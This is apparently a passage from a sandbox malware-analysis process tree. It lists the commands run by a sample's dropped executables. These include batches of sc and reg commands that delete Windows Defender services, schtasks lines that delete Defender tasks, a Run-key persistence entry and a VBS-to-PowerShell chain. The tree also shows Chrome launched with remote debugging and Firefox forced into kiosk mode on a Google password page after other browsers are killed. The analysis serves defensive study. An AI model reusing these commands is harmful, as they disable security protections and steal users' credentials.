                        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                        8⤵
                          PID:1708
                        • C:\Windows\system32\sc.exe
                          sc stop "MDCoreSvc"
                          8⤵
                          • Launches sc.exe
                          PID:1692
                        • C:\Windows\system32\sc.exe
                          sc delete "MDCoreSvc"
                          8⤵
                          • Launches sc.exe
                          PID:1792
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                          8⤵
                            PID:2064
                          • C:\Windows\system32\sc.exe
                            sc stop "WdNisSvc"
                            8⤵
                            • Launches sc.exe
                            PID:2128
                          • C:\Windows\system32\sc.exe
                            sc delete "WdNisSvc"
                            8⤵
                            • Launches sc.exe
                            PID:560
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                            8⤵
                              PID:2344
                            • C:\Windows\system32\sc.exe
                              sc stop "Sense"
                              8⤵
                              • Launches sc.exe
                              PID:856
                            • C:\Windows\system32\sc.exe
                              sc delete "Sense"
                              8⤵
                              • Launches sc.exe
                              PID:612
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                              8⤵
                                PID:776
                              • C:\Windows\system32\sc.exe
                                sc stop "wscsvc"
                                8⤵
                                • Launches sc.exe
                                PID:2428
                              • C:\Windows\system32\sc.exe
                                sc delete "wscsvc"
                                8⤵
                                • Launches sc.exe
                                PID:1524
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                8⤵
                                  PID:2072
                                • C:\Windows\system32\sc.exe
                                  sc stop "SgrmBroker"
                                  8⤵
                                  • Launches sc.exe
                                  PID:1028
                                • C:\Windows\system32\sc.exe
                                  sc delete "SgrmBroker"
                                  8⤵
                                  • Launches sc.exe
                                  PID:2556
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                  8⤵
                                    PID:1476
                                  • C:\Windows\system32\sc.exe
                                    sc stop "SecurityHealthService"
                                    8⤵
                                    • Launches sc.exe
                                    PID:2372
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SecurityHealthService"
                                    8⤵
                                    • Launches sc.exe
                                    PID:1912
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                    8⤵
                                      PID:2204
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefsvc"
                                      8⤵
                                      • Launches sc.exe
                                      PID:2124
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefsvc"
                                      8⤵
                                      • Launches sc.exe
                                      PID:1548
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                      8⤵
                                        PID:1136
                                      • C:\Windows\system32\sc.exe
                                        sc stop "webthreatdefusersvc"
                                        8⤵
                                        • Launches sc.exe
                                        PID:852
                                      • C:\Windows\system32\sc.exe
                                        sc delete "webthreatdefusersvc"
                                        8⤵
                                        • Launches sc.exe
                                        PID:264
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                        8⤵
                                          PID:1556
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdNisDrv"
                                          8⤵
                                          • Launches sc.exe
                                          PID:2340
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdNisDrv"
                                          8⤵
                                          • Launches sc.exe
                                          PID:2500
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                          8⤵
                                            PID:1700
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdBoot"
                                            8⤵
                                            • Launches sc.exe
                                            PID:2764
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdBoot"
                                            8⤵
                                            • Launches sc.exe
                                            PID:1796
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                            8⤵
                                              PID:2868
                                            • C:\Windows\system32\sc.exe
                                              sc stop "WdFilter"
                                              8⤵
                                              • Launches sc.exe
                                              PID:2916
                                            • C:\Windows\system32\sc.exe
                                              sc delete "WdFilter"
                                              8⤵
                                              • Launches sc.exe
                                              PID:2508
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                              8⤵
                                                PID:2376
                                              • C:\Windows\system32\sc.exe
                                                sc stop "SgrmAgent"
                                                8⤵
                                                • Launches sc.exe
                                                PID:2384
                                              • C:\Windows\system32\sc.exe
                                                sc delete "SgrmAgent"
                                                8⤵
                                                • Launches sc.exe
                                                PID:3044
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                8⤵
                                                  PID:3060
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecWfp"
                                                  8⤵
                                                  • Launches sc.exe
                                                  PID:2120
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecWfp"
                                                  8⤵
                                                  • Launches sc.exe
                                                  PID:1892
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                  8⤵
                                                    PID:2176
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecFlt"
                                                    8⤵
                                                    • Launches sc.exe
                                                    PID:2168
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecFlt"
                                                    8⤵
                                                    • Launches sc.exe
                                                    PID:1552
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                    8⤵
                                                      PID:3036
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "MsSecCore"
                                                      8⤵
                                                      • Launches sc.exe
                                                      PID:2604
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "MsSecCore"
                                                      8⤵
                                                      • Launches sc.exe
                                                      PID:2708
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                      8⤵
                                                        PID:2468
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                        8⤵
                                                          PID:2096
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                          8⤵
                                                            PID:2724
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                            8⤵
                                                              PID:2300
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                              8⤵
                                                                PID:1588
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop ddrver
                                                                8⤵
                                                                • Launches sc.exe
                                                                PID:2060
                                                              • C:\Windows\system32\sc.exe
                                                                sc delete ddrver
                                                                8⤵
                                                                • Launches sc.exe
                                                                PID:1924
                                                    • C:\Users\Admin\AppData\Local\Temp\10338710101\17e149dbfb.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10338710101\17e149dbfb.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:2784
                                                      • C:\Windows\system32\WerFault.exe
                                                        C:\Windows\system32\WerFault.exe -u -p 2784 -s 36
                                                        4⤵
                                                        • Loads dropped DLL
                                                        PID:2632
                                                    • C:\Users\Admin\AppData\Local\Temp\10338720101\e024e105da.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10338720101\e024e105da.exe"
                                                      3⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1356
                                                    • C:\Users\Admin\AppData\Local\Temp\10338730101\221764ef7a.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10338730101\221764ef7a.exe"
                                                      3⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Downloads MZ/PE file
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Loads dropped DLL
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Checks processor information in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2936
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                        4⤵
                                                        • Uses browser remote debugging
                                                        • Enumerates system info in registry
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:636
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6a09758,0x7fef6a09768,0x7fef6a09778
                                                          5⤵
                                                            PID:2172
                                                          • C:\Windows\system32\ctfmon.exe
                                                            ctfmon.exe
                                                            5⤵
                                                              PID:580
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1120 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:2
                                                              5⤵
                                                                PID:792
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:8
                                                                5⤵
                                                                  PID:2460
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1604 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:8
                                                                  5⤵
                                                                    PID:2764
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2124 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:1
                                                                    5⤵
                                                                    • Uses browser remote debugging
                                                                    PID:3000
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2392 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:1
                                                                    5⤵
                                                                    • Uses browser remote debugging
                                                                    PID:2452
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2400 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:1
                                                                    5⤵
                                                                    • Uses browser remote debugging
                                                                    PID:1732
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1336 --field-trial-handle=1228,i,3187177078219092050,9023046056031875069,131072 /prefetch:2
                                                                    5⤵
                                                                      PID:2200
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                    4⤵
                                                                    • Uses browser remote debugging
                                                                    • Enumerates system info in registry
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:3384
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef46b9758,0x7fef46b9768,0x7fef46b9778
                                                                      5⤵
                                                                        PID:3396
                                                                      • C:\Windows\system32\ctfmon.exe
                                                                        ctfmon.exe
                                                                        5⤵
                                                                          PID:3532
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1152 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:2
                                                                          5⤵
                                                                            PID:3588
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1380 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:8
                                                                            5⤵
                                                                              PID:3596
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1556 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:8
                                                                              5⤵
                                                                                PID:3768
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2180 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:1
                                                                                5⤵
                                                                                • Uses browser remote debugging
                                                                                PID:3788
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2632 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:1
                                                                                5⤵
                                                                                • Uses browser remote debugging
                                                                                PID:3880
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2640 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:1
                                                                                5⤵
                                                                                • Uses browser remote debugging
                                                                                PID:3916
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1668 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:2
                                                                                5⤵
                                                                                  PID:3580
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3788 --field-trial-handle=1448,i,8613657538182929132,11530306709400565531,131072 /prefetch:8
                                                                                  5⤵
                                                                                    PID:3588
                                                                              • C:\Users\Admin\AppData\Local\Temp\10338740101\65516ed6cf.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\10338740101\65516ed6cf.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:2472
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /F /IM firefox.exe /T
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1800
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /F /IM chrome.exe /T
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1860
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /F /IM msedge.exe /T
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2548
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /F /IM opera.exe /T
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1560
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /F /IM brave.exe /T
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2808
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                  4⤵
                                                                                    PID:2640
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                      5⤵
                                                                                      • Checks processor information in registry
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:900
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.0.2092125203\1852918843" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {752472b1-c101-43f1-9770-d19a0e1c39d9} 900 "\\.\pipe\gecko-crash-server-pipe.900" 1284 10dc1858 gpu
                                                                                        6⤵
                                                                                          PID:1356
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.1.565666060\1032224838" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1ddfb3b-d810-42e2-85dd-6613e92e4851} 900 "\\.\pipe\gecko-crash-server-pipe.900" 1500 10d03258 socket
                                                                                          6⤵
                                                                                            PID:2160
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.2.918592524\296950844" -childID 1 -isForBrowser -prefsHandle 2092 -prefMapHandle 2088 -prefsLen 21811 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2725b7aa-c49d-4e6c-8735-9414a8236d2e} 900 "\\.\pipe\gecko-crash-server-pipe.900" 2104 1aad9f58 tab
                                                                                            6⤵
                                                                                              PID:2812
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.3.172276356\1174216729" -childID 2 -isForBrowser -prefsHandle 2916 -prefMapHandle 2912 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {584bb732-a6aa-495e-b516-aae7de8d0e29} 900 "\\.\pipe\gecko-crash-server-pipe.900" 2928 1dc06858 tab
                                                                                              6⤵
                                                                                                PID:2792
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.4.1267517237\1383386919" -childID 3 -isForBrowser -prefsHandle 3748 -prefMapHandle 3744 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ad0f593-883a-4b55-aa94-e285d0074abe} 900 "\\.\pipe\gecko-crash-server-pipe.900" 3760 20969058 tab
                                                                                                6⤵
                                                                                                  PID:2720
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.5.1830560616\1186977002" -childID 4 -isForBrowser -prefsHandle 3760 -prefMapHandle 3880 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {edadb329-9cc9-46bb-ab47-3dbee745acfc} 900 "\\.\pipe\gecko-crash-server-pipe.900" 3988 20f98d58 tab
                                                                                                  6⤵
                                                                                                    PID:2764
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="900.6.181219104\1991196177" -childID 5 -isForBrowser -prefsHandle 4100 -prefMapHandle 4104 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ac48791-9403-4120-a419-adf536d29a3c} 900 "\\.\pipe\gecko-crash-server-pipe.900" 4084 20f99658 tab
                                                                                                    6⤵
                                                                                                      PID:2984
                                                                                              • C:\Users\Admin\AppData\Local\Temp\10338750101\b43449a9e4.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\10338750101\b43449a9e4.exe"
                                                                                                3⤵
                                                                                                • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                • Modifies Windows Defender TamperProtection settings
                                                                                                • Modifies Windows Defender notification settings
                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                • Checks BIOS information in registry
                                                                                                • Executes dropped EXE
                                                                                                • Identifies Wine through registry keys
                                                                                                • Windows security modification
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3828
                                                                                              • C:\Users\Admin\AppData\Local\Temp\10338760101\Q1DOy22.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\10338760101\Q1DOy22.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Adds Run key to start application
                                                                                                PID:3860
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  cmd.exe /c 67e2ff36de8a3.vbs
                                                                                                  4⤵
                                                                                                    PID:3784
                                                                                                    • C:\Windows\System32\WScript.exe
                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e2ff36de8a3.vbs"
                                                                                                      5⤵
                                                                                                        PID:3428
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
